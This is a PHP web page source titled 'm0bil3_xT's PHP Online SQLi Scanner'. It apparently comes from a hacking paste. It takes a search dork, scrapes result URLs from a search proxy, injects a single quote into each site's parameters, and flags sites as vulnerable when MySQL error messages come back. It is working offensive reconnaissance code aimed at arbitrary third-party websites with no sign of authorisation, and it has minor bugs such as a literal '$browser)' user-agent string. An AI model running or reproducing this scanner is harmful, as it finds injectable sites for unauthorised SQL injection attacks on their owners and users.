m0bil3_xT's PHP Online SQLi Scanner

1. <html>
2. <head>
3. <title>m0bil3_xT's SQLi Scanner</title>
4.  
5. <center><img src="http://i.imgur.com/lH3GO.png">
6. </center>
7.  
8. </head>
9. <body bgcolor=#000000>
10.  
11. <style>
12. body{
13. font: 10pt Verdana;
14. }
15. tr {
16. BORDER-RIGHT: #3e3e3e 1px solid;
17. BORDER-TOP: #3e3e3e 1px solid;
18. BORDER-LEFT: #3e3e3e 1px solid;
19. BORDER-BOTTOM: #3e3e3e 1px solid;
20. color: #ff9900;
21. }
22. td {
23. BORDER-RIGHT: #3e3e3e 1px solid;
24. BORDER-TOP: #3e3e3e 1px solid;
25. BORDER-LEFT: #3e3e3e 1px solid;
26. BORDER-BOTTOM: #3e3e3e 1px solid;
27. color: #2BA8EC;
28. font: 10pt Verdana;
29. }
30.  
31. table {
32. BORDER-RIGHT: #3e3e3e 1px solid;
33. BORDER-TOP: #3e3e3e 1px solid;
34. BORDER-LEFT: #3e3e3e 1px solid;
35. BORDER-BOTTOM: #3e3e3e 1px solid;
36. BACKGROUND-COLOR: #111;
37. }
38.  
39.  
40. input {
41. BORDER-RIGHT: #3e3e3e 1px solid;
42. BORDER-TOP: #3e3e3e 1px solid;
43. BORDER-LEFT: #3e3e3e 1px solid;
44. BORDER-BOTTOM: #3e3e3e 1px solid;
45. BACKGROUND-COLOR: Black;
46. font: 10pt Verdana;
47. color: #ff9900;
48. }
49.  
50. input.submit {
51. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
52. color: #FFFFFF;
53. border-color: #009900;
54. }
55.  
56. code {
57. border : dashed 0px #333;
58. BACKGROUND-COLOR: Black;
59. font: 10pt Verdana bold;
60. color: while;
61. }
62.  
63. run {
64. border : dashed 0px #333;
65. font: 10pt Verdana bold;
66. color: #FF00AA;
67. }
68.  
69. textarea {
70. BORDER-RIGHT: #3e3e3e 1px solid;
71. BORDER-TOP: #3e3e3e 1px solid;
72. BORDER-LEFT: #3e3e3e 1px solid;
73. BORDER-BOTTOM: #3e3e3e 1px solid;
74. BACKGROUND-COLOR: #1b1b1b;
75. font: Fixedsys bold;
76. color: #aaa;
77. }
78. A:link {
79. COLOR: #2BA8EC; TEXT-DECORATION: none
80. }
81. A:visited {
82. COLOR: #2BA8EC; TEXT-DECORATION: none
83. }
84. A:hover {
85. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
86. color: #ff9900; TEXT-DECORATION: none
87. }
88. A:active {
89. color: Red; TEXT-DECORATION: none
90. }
91.  
92. .listdir tr:hover{
93. background: #444;
94. }
95. .listdir tr:hover td{
96. background: #444;
97. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
98. color: #FFFFFF; TEXT-DECORATION: none;
99. }
100. .notline{
101. background: #111;
102. }
103. .line{
104. background: #222;
105. }
106. </style>
107.  
108. <center>
109. <br/>
110.  
111. <?php
112.  
113. echo "<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0,
114.  
115. 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;' size='5'> </font><br><font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px
116.  
117. rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'
118.  
119. size='5'></font></b><br><br><center><a href='
120.  
121. target='_blank'></a><br><a</a></center><br></font><center><font style='text-shadow: 0px 0px 6px rgb(255, 0,
122.  
123. 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff;
124.  
125. font-weight:bold;' size='2'></font><br><br></center>";
126.  
127. $your_ip = $_SERVER['REMOTE_ADDR'];
128. echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
129.  
130. size='2'>Your IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
131.  
132. font-weight:bold;' color=#FF0000 size='2'>$your_ip</font><br>";
133.  
134. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
135. echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
136.  
137. size='2'>Server IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
138.  
139. font-weight:bold;' color=#FF0000 size='2'>$server_ip </font><br><br>";
140.  
141. echo '<form method="post" action=""><font color="red">Dork :</font> <input type="text"
142.  
143. value="" name="dork" size="20"/><input type="submit" name="scan"
144.  
145. value="Scan"></form></center>';
146.  
147. ob_start();
148. set_time_limit(0);
149.  
150. if (isset($_POST['scan'])) {
151.  
152. $browser = $_SERVER['HTTP_USER_AGENT'];
153.  
154. $first = "startgoogle.startpagina.nl/index.php?q=";
155. $sec = "&start=";
156. $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
157.  
158. for($id=0 ; $id<=30; $id++){
159. $page=$id*10;
160. $dork=urlencode($_POST['dork']);
161. $url = $first.$dork.$sec.$page;
162.  
163. $curl = curl_init($url);
164. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
165. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
166. $result = curl_exec($curl);
167. curl_close($curl);
168.  
169. preg_match_all($reg,$result,$matches);
170.  
171. foreach($matches[1] as $site){
172.  
173. $url = preg_replace("/=/", "='", $site);
174. $curl=curl_init();
175. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
176. curl_setopt($curl,CURLOPT_URL,$url);
177. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
178. curl_setopt($curl,CURLOPT_TIMEOUT,'5');
179. $GET=curl_exec($curl);
180. if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute
181.  
182. query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row
183.  
184. ()|SELECT *
185.  
186. FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
187. echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'"
188.  
189. target="_blank">'.$url.'</a><font color=#FF0000> &#60;-- SQLI Vuln
190.  
191. Found..</font></b></center>';
192. ob_flush();flush();
193. }else{
194. echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16">
195.  
196. &#60;-- Not Vuln</font></center>';
197. ob_flush();flush();
198. }
199.  
200. ob_flush();flush();
201. }
202. ob_flush();flush();
203. }
204. ob_flush();flush();
205. }
206.  
207. ?>
208. </body>
209. </html>